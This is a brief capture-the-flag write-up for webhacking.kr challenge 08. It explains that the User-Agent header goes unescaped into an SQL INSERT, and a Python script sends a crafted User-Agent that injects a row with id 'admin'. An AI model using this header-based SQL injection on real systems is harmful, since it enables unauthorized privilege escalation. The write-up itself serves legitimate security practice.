[webhacking.kr] 08¶
server -> DB¶
- PHP
- GET 파라미터: HTTP_USER_AGENT
insert into lv0(agent,ip,id)
values('$_SERVER[HTTP_USER_AGENT]','$ip','guest')
insert¶
import requests
url = "http://webhacking.kr/challenge/web/web-08/index.php"
headers = {
"User-Agent":"joizel','2.2.2.2','admin');#"
}
cookies = {
"PHPSESSID":"9johqp6c81c5hf11lkomnghhn6"
}
r = requests.get(url, headers = headers, cookies=cookies, verify=False)
print r.content